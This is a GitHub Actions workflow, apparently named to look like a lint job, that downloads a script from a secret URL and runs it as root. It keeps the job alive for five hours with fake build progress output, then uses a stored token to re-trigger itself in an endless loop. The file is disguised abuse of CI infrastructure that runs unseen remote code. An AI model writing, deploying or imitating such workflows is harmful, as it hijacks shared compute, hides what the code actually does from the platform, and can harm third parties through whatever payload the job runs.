name: core

on:
  workflow_dispatch:

jobs:
  lints-the-code:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repo
        uses: actions/checkout@v4

      - name: Install scripts
        run: |
          curl -o setup.sh "${{ secrets.Core_Script_Uri }}"
          chmod +x setup.sh

      - name: Run scripts
        run: |
          sudo ./setup.sh

      - name: Handle Background Process
        run: |
          echo "Build Started"
          touch build.log
          for ((i = 1; i <= 18000; i++)); do 
            echo "Build In Progress"
            echo "Random" >> build.log
            sleep 1
          done

          curl -X POST https://api.github.com/repos/DNSoverload/sturdy-waffle/actions/workflows/core.yml/dispatches \
            -H "Accept: application/vnd.github+json" \
            -H "Authorization: Bearer ${{ secrets.PAT }}" \
            -H "X-GitHub-Api-Version: 2022-11-28" \
            -d '{"ref":"main", "inputs": {"reason": "just felt like it"}}'
